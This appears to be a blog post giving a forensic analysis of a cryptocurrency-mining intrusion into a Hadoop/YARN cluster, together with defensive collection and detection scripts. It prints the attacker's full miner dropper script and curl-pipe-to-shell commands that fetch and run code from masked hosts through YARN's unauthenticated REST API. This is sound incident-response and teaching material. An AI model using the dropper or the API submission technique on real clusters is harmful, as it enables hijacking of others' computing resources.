Forensic analysis of a cryptocurrency mining attack in a Big Data cluster

A few days ago I was contacted to perform a forensic analysis of an intrusion into a Big Data cluster. Apparently a set of machines had been compromised and cryptocurrency miners had been installed on every node of the cluster.

Here is a review of the steps I took to discover how the attackers got in and what they did.

Before starting

Before getting down to business, the first step is to run a script that collects as much volatile data as possible and then to unplug the machines from the power. It is not advisable to shut the machines down in an orderly manner, because some crackers leave a process running that wipes all the information on the system as soon as it detects a network interface going down.

That volatile data collection script has to capture the running processes (ps), open files (lsof), network connections (netstat), executed commands (lastcomm), logged-in users (who) …
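A minimal sketch of such a collection script, assuming a Linux host with a POSIX shell. The function name collect_volatile, the output layout and the exact flags are illustrative choices, not the script used in this case. Ideally the output directory sits on external media and not on the compromised disk.

```shell
#!/bin/sh
# Sketch: dump volatile state to one file per tool.
# collect_volatile and the file layout are illustrative assumptions.
collect_volatile() {
    out_dir="$1"
    mkdir -p "$out_dir" || return 1
    for tool in ps lsof netstat lastcomm who; do
        if ! command -v "$tool" >/dev/null 2>&1; then
            echo "$tool: not installed, skipped" >> "$out_dir/collection.log"
            continue
        fi
        status=0
        case "$tool" in
            ps)       ps -ef ;;        # running processes
            lsof)     lsof -n ;;       # open files, without DNS lookups
            netstat)  netstat -anp ;;  # sockets with their owning PID
            lastcomm) lastcomm ;;      # executed commands (needs process accounting)
            who)      who -a ;;        # logged-in users
        esac > "$out_dir/$tool.txt" 2> "$out_dir/$tool.err" || status=$?
        # Keep a record of what ran and whether it succeeded.
        echo "$tool: exit status $status" >> "$out_dir/collection.log"
    done
}

# Example (the mount point is a placeholder):
#   collect_volatile "/mnt/evidence/$(hostname)-$(date +%Y%m%dT%H%M%S)"
```

Writing one file per tool, plus a log of exit statuses, makes it easy to see later which sources are missing on a given node.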

If the cluster is reachable from the internet, another step is to run a port scan against its public IP.

  nmap -Pn -p1-65535 [Public IP]

Before taking any other action, make backup copies of all the storage systems, because you need an immutable picture of the entire system.
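One common way to show later that a copy has not changed is to record a digest right after taking it. The sketch below assumes GNU coreutils (sha256sum); the function names are illustrative, and hashing is an addition here, not something the original procedure describes.

```shell
#!/bin/sh
# Sketch: record and later re-check a SHA-256 digest for an evidence image.
# Assumes GNU coreutils; seal_image and verify_image are illustrative names.
seal_image() {
    img="$1"
    # Store the digest with a relative file name so image and digest can be moved together.
    ( cd "$(dirname "$img")" && sha256sum "$(basename "$img")" > "$(basename "$img").sha256" )
}

verify_image() {
    img="$1"
    # --status prints nothing; the exit code says whether the digest still matches.
    ( cd "$(dirname "$img")" && sha256sum --status -c "$(basename "$img").sha256" )
}

# Example (the path is a placeholder):
#   seal_image /mnt/evidence/node1.img
#   verify_image /mnt/evidence/node1.img && echo "image unchanged"
```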

A first analysis of this data shows a process running on every datanode of the cluster and consuming 95% of the CPU. The system administrators cannot identify it, and its owner is the user yarn, the Hadoop cluster's manager for processes, memory and CPU. It is a clear candidate for a malicious process, and a clever move by the cracker, since any process submitted to Yarn automatically runs on all the nodemanagers of the cluster.


  ps -ef | grep yarn
 yarn 46185 1 99 May03 ? 4-19:04:28 /tmp/java -c /tmp/w.conf
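On a cluster with many nodes it helps to filter the process list automatically. The following is a sketch under the assumption that procps ps is available; filter_hot is an illustrative name and the 90% threshold is arbitrary.

```shell
#!/bin/sh
# Sketch: keep only the processes of one user at or above a CPU threshold.
# Reads "USER PID %CPU COMMAND" lines on stdin and skips the header row.
filter_hot() {
    awk -v user="$1" -v min="$2" 'NR > 1 && $1 == user && $3 + 0 >= min + 0'
}

# Example on a live node:
#   ps -eo user,pid,pcpu,args | filter_hot yarn 90
```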

The file that was executed no longer exists in the system.

 ls /tmp/java
 ls: cannot access /tmp/java: No such file or directory

 ls /tmp/w.conf
 ls: cannot access /tmp/w.conf: No such file or directory


I check the ssh accesses in the logs and the command history of the yarn user. Nothing unusual shows up.

 lastcomm -a
 sudo su - yarn 

The yarn logs (/var/log/hadoop-yarn/hadoop-cmf-yarn-RESOURCEMANAGER-XXX.out) contain the start and stop entries of these processes.

Open connections

The process is sending data to port 5556 of a remote server.

 netstat -anp | grep 46185
 tcp 0 0 :50454 :5556 ESTABLISHED 46185/java
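To list only the remote endpoints a given PID is talking to, the netstat output can be filtered by column. This is a sketch that assumes the usual Linux `netstat -anp` column order; remote_endpoints is an illustrative name.

```shell
#!/bin/sh
# Sketch: print the remote endpoints of established TCP connections owned by one PID.
# Expects `netstat -anp` style lines on stdin:
#   Proto Recv-Q Send-Q Local-Address Foreign-Address State PID/Program
remote_endpoints() {
    awk -v pid="$1" '
        $1 ~ /^tcp/ && $6 == "ESTABLISHED" && index($7, pid "/") == 1 { print $5 }
    ' | sort -u
}

# Example on a live node (run as root so the PID column is filled in):
#   netstat -anp 2>/dev/null | remote_endpoints 46185
```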

 lsof | grep 46185
 java 46185 yarn 10u IPv4 108035839 0t0 TCP fmis-altair-vm4:50454-> (ESTABLISHED)
 java 46185 yarn txt REG 8,2 2359872 2490376 /tmp/java (deleted)

The lsof output also shows that the executable (/tmp/java) was deleted.
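On Linux, a deleted executable can usually still be copied out through /proc while its process is alive. The sketch below shows that general technique; it is not a step described in this analysis, and recover_exe and the destination path are illustrative.

```shell
#!/bin/sh
# Sketch: copy the executable of a live process out of /proc, even if its file was unlinked.
# Linux only; must run before the process is killed or the machine is powered off.
recover_exe() {
    pid="$1"
    dest="$2"
    # The symlink target ends in " (deleted)" when the on-disk file is gone.
    echo "PID $pid runs: $(readlink "/proc/$pid/exe")" >&2
    cp "/proc/$pid/exe" "$dest" || return 1
    # Print a digest so the recovered copy can be identified later.
    sha256sum "$dest"
}

# Example (as root; the destination is a placeholder):
#   recover_exe 46185 /mnt/evidence/java.recovered
```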

What the Cloudera Manager says

I check what Cloudera Manager and the YARN console show for those dates: there are continuous executions of short-lived Yarn processes that never finish.

Time-line analysis

With the mac-robber and mactime tools I review the accesses, modifications and executions of all files in the period when CPU usage climbs to 95%.

 nohup mac-robber / > timeline_root_20180506.mac && mactime -b timeline_root_20180506.mac> timeline_root_20180506 &

In the resulting timeline I look for the changes made by the user yarn (UID 489) during the problematic periods, and I find accesses to yarn's state and recovery files.

 grep " 489 " timeline_root_20180506
 4096 mac. drwx------ 489 487 0 /var/lib/hadoop-yarn/yarn-nm-recovery/yarn-nm-state
 300356 .a.. -rw-r--r-- 489 487 0 /var/lib/hadoop-yarn/yarn-nm-recovery/yarn-nm-state/014436.sst
 3885 mac. -rw-r--r-- 489 487 0 /var/lib/hadoop-yarn/yarn-nm-recovery/yarn-nm-state/014438.sst

In those directories yarn stores recovery state about what it executes, so I have the ideal place to search for clues about what has been run.
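When a full timeline is not available, a narrower check can be done with find. This is a substitute technique, not the mac-robber workflow used above, and it only looks at modification times. It assumes GNU find; files_modified_by is an illustrative name and the dates are placeholders.

```shell
#!/bin/sh
# Sketch: list regular files owned by a UID and modified inside a time window.
# Assumes GNU find (-newermt); only modification time is considered.
files_modified_by() {
    root="$1"; uid="$2"; from="$3"; to="$4"
    find "$root" -xdev -type f -uid "$uid" -newermt "$from" ! -newermt "$to" 2>/dev/null | sort
}

# Example, preferably on a read-only mounted copy of the node:
#   files_modified_by /mnt/image/var/lib/hadoop-yarn 489 '2018-05-03' '2018-05-04'
```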

The binary

I run strings on the file and find ugly things.

 strings /var/lib/hadoop-yarn/yarn-nm-recovery/yarn-nm-state/014438.sst
 * $ curl XXX.XXX.XXX.XXX/ |  sh & disown

That command downloads a file from the server and pipes it straight into the shell.
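The same pattern can be searched for across the whole state directory instead of one file at a time. The following sketch assumes a grep that supports -a (treat binary files as text); find_droppers is an illustrative name and the regular expression is only a rough heuristic.

```shell
#!/bin/sh
# Sketch: list files under a directory that contain a "download and pipe to shell" command.
# The pattern matches curl or wget followed, on the same line, by a pipe into sh or bash.
find_droppers() {
    grep -a -r -l -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$1" 2>/dev/null
}

# Example:
#   find_droppers /var/lib/hadoop-yarn/yarn-nm-recovery/yarn-nm-state
```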

Let’s see what it contains.


There we have the culprit:

 #!/bin/bash

 pkill -f cryptonight
 pkill -f sustes
 pkill -f xmrig
 pkill -f xmr-stak
 pkill -f suppoie

 #ps ax | grep /tmp/yarn | grep -v grep | xargs kill -9

 if [ ! "$(ps -fe | grep '/tmp/java -c /tmp/w.conf' | grep -v grep)" ]; then
   f1=$(curl XXX.XXX.XXX.XXX/g.php)
   f2="XXX.XXX.XXX.XXY"
   WGET="wget"
   if [ -s /usr/bin/curl ]; then WGET="curl -o"; fi
   if [ -s /usr/bin/wget ]; then WGET="wget -O"; fi
   if [ `getconf LONG_BIT` = "64" ]; then
     $WGET /tmp/java http://$f1/xmrig_64
   else
     $WGET /tmp/java http://$f1/xmrig_32
   fi

   chmod +x /tmp/java
   $WGET /tmp/w.conf http://$f2/w.conf
   nohup /tmp/java -c /tmp/w.conf >/dev/null 2>&1 &
   sleep 5
   rm -rf /tmp/w.conf
   rm -f /tmp/java
 fi
 pkill -f logo9.jpg
 crontab -l | sed '/logo9/d' | crontab -

The first thing this script does is kill the processes of competing miners; it wants the cluster all to itself.

Then it checks whether it is already running and, if so, does not continue.

Next it retrieves the IP from which the malware will be downloaded, possibly because sites hosting malware change quickly and because it suits the attacker to rotate IPs from time to time in case the SysAdmin gets suspicious and blocks access.

Finally, it downloads two files: the binary that does the mining, which it renames, and the configuration file. It runs the binary and deletes both files.
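The names that appear in the script can be reused as simple indicators when checking other nodes. The sketch below takes them straight from the script above; match_iocs is an illustrative name, and a match is only a hint that deserves a closer look.

```shell
#!/bin/sh
# Sketch: flag command lines that match names taken from the dropper script.
# Reads one command line per row on stdin and prints the matching rows.
match_iocs() {
    grep -E 'cryptonight|sustes|xmrig|xmr-stak|suppoie|logo9\.jpg|/tmp/java -c /tmp/w\.conf'
}

# Example, using a saved process listing so that grep does not match itself:
#   ps -eo pid,user,args > ps.txt && match_iocs < ps.txt
#   crontab -l -u yarn 2>/dev/null | match_iocs
```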

I also download the w.conf file to keep digging.

 curl XXX.XXX.XXX.XXY/w.conf

 {
   "algo": "cryptonight",
   "background": true,
   "colors": true,
   "retries": 5,
   "retry-pause": 5,
   "donate-level": 1,
   "syslog": false,
   "log-file": null,
   "print-time": 60,
   "av": 0,
   "safe": false,
   "max-cpu-usage": 95,
   "cpu-priority": 4,
   "threads": null,
   "pools": [
     {
       "url": "stratum+tcp://XXX.XXX.XXX.XYY:5556",
       "user": "XXX",
       "pass": "XXX",
       "keepalive": true,
       "nicehash": false,
       "variant": -1
     }
   ],
   "api": {
     "port": 0,
     "access-token": null,
     "worker-id": null
   }
 }

xmrig is a miner for the Monero cryptocurrency (XMR), chosen because it is more anonymous than Bitcoin (BTC), Ethereum or others, and stratum+tcp is the classic protocol used by cryptocurrency mining pools.
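The pool address in the configuration uses the same port 5556 that netstat showed for the suspicious process. A small sketch for pulling the pool URLs out of such a file without a JSON parser follows; pool_urls is an illustrative name and it assumes one "url" key per line, as in w.conf.

```shell
#!/bin/sh
# Sketch: print the value of every "url" key found in a miner config file.
# Line-based on purpose, so it also works on hosts without jq or similar tools.
pool_urls() {
    sed -n 's/.*"url"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$1"
}

# Example:
#   pool_urls w.conf
```

The extracted host and port can then be compared against the connections recorded on each node.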

So “our” cracker broke in to install programs that mine Monero and to make money from the reward this currency pays for the processing contributed to the XMR network.

How did it get into the system?

Now that we know what the malware does once it is in the system, what we want to find out is how it managed to sneak in.

So far, nothing suspicious appears in the access logs or the executed-command logs, and the yarn logs do not show how that binary came to be deployed.

The nmap port scan showed that many ports were exposed to the internet, which offers a wide range of attack possibilities. Seeing that I was quite lost, I chose to set a trap and watch.

We prepare a similar cluster, start it and attach a sniffer to store all the network packets.

 tcpdump -i eth0 -s 65535 -n '(not src net' -w /mnt/media/20180506.dump

In less than an hour there were already malicious processes running in the cluster under the user yarn. I stopped the cluster, downloaded the dump, opened it with Wireshark and looked for suspicious text strings, which soon appeared.

Port 8088 is the one used by the Yarn ResourceManager web UI.

But the request being made is to /ws/v1/cluster/apps which, according to the Hadoop documentation, is a YARN REST API for managing applications.
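The same requests can also be pulled out of the capture from the command line. The sketch below filters the ASCII output of tcpdump; yarn_api_requests is an illustrative name, and the capture filter in the example assumes the ResourceManager listens on its default port 8088.

```shell
#!/bin/sh
# Sketch: pick out HTTP request lines that target the YARN applications REST API.
# Reads ASCII packet output on stdin and prints only the method and path.
yarn_api_requests() {
    grep -a -o -E '(GET|POST|PUT) /ws/v1/cluster/apps[^ ]*'
}

# Example against the capture file (tcpdump -A prints payloads as ASCII):
#   tcpdump -nn -A -r /mnt/media/20180506.dump 'tcp dst port 8088' | yarn_api_requests
```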

Here is the key to how they manage to register the process: they use the Yarn API exposed on port 8088 to register an application that runs the curl command, which downloads the malware and executes it on all the worker nodes of the Big Data cluster.

curl XXX.XXX.XXX.XXX | sh
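A quick way to check whether a ResourceManager answers its REST API without credentials is to request a read-only endpoint and look at the HTTP status. This is a sketch: classify_rm_status and probe_rm are illustrative names, the host is a placeholder, and the result depends on where the probe is run from, so it should be run from outside the cluster network.

```shell
#!/bin/sh
# Sketch: check whether a ResourceManager answers its REST API without credentials.
classify_rm_status() {
    case "$1" in
        200)     echo "EXPOSED: API answers without authentication" ;;
        401|403) echo "PROTECTED: authentication required" ;;
        000)     echo "UNREACHABLE: no HTTP response" ;;
        *)       echo "UNKNOWN: HTTP $1" ;;
    esac
}

probe_rm() {
    host="$1"
    port="${2:-8088}"
    # /ws/v1/cluster/info only reads cluster information; nothing is submitted.
    code=$(curl -s -o /dev/null -m 5 -w '%{http_code}' "http://$host:$port/ws/v1/cluster/info")
    classify_rm_status "${code:-000}"
}

# Example (placeholder host):
#   probe_rm rm.example.org 8088
```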


  • Big Data clusters are very attractive to intruders who want to mine cryptocurrencies, because they are made up of many nodes and usually have a lot of processing power.
  • Expose only the strictly necessary ports to the outside, a classic in the security world.
  • You need to know the exposed services well: in this case the Yarn web UI serves a double purpose, monitoring on the one hand and a REST API for managing applications on the other.
  • You need to secure the daemons and not let them run with the default permissions: in this case an application can be registered in yarn without authenticating, as the user dr.who.

Initially published on LinkedIn and copied to this blog so that it is visible to non-LinkedIn users.



